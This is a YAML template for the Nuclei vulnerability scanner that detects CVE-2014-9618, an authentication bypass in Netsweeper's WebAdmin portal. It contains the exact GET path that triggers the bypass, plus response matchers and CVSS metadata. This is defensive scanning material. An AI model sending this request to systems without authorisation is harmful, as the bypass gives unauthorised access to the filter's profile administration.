nuclei-templates/http/cves/2014/CVE-2014-9618.yaml

51 lines
2.0 KiB
YAML

id: CVE-2014-9618
info:
name: Netsweeper - Authentication Bypass
author: daffainfo
severity: critical
description: |
The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9618
- https://www.exploit-db.com/exploits/37933/
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-9618
cwe-id: CWE-287
epss-score: 0.03433
epss-percentile: 0.91476
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: netsweeper
product: netsweeper
tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss
http:
- method: GET
path:
- '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
- 'placeholder="Profile Manager">'
- '<title>Netsweeper WebAdmin</title>'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100e2c30dafcfaf747bbc1516a801b6f0c0418d72acb0e771939826193d9a93291502204f311d75a2cb0ae12aef112c90a354bd53451d367c99671aed2bd4bd2c4f8621:922c64590222798bb761d5b6d8e72950